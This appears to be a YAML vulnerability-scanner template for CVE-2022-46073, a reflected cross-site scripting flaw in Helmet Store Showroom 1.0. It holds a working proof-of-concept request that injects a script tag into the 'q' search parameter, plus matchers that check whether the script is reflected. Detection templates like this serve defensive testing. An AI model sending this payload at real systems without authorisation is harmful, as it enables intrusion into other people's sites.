33 lines
875 B
YAML
33 lines
875 B
YAML
|
id: CVE-2022-46073
|
||
|
|
||
|
info:
|
||
|
name: Reflected Cross Site Scripting
|
||
|
author: Harsh
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).
|
||
|
reference:
|
||
|
- https://yuyudhn.github.io/CVE-2022-46073/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-46073
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2022-46073
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2022,xss
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(body, "Helmet Store Showroom")'
|
||
|
- 'contains(body, "><script>alert(document.domain)</script>")'
|
||
|
condition: and
|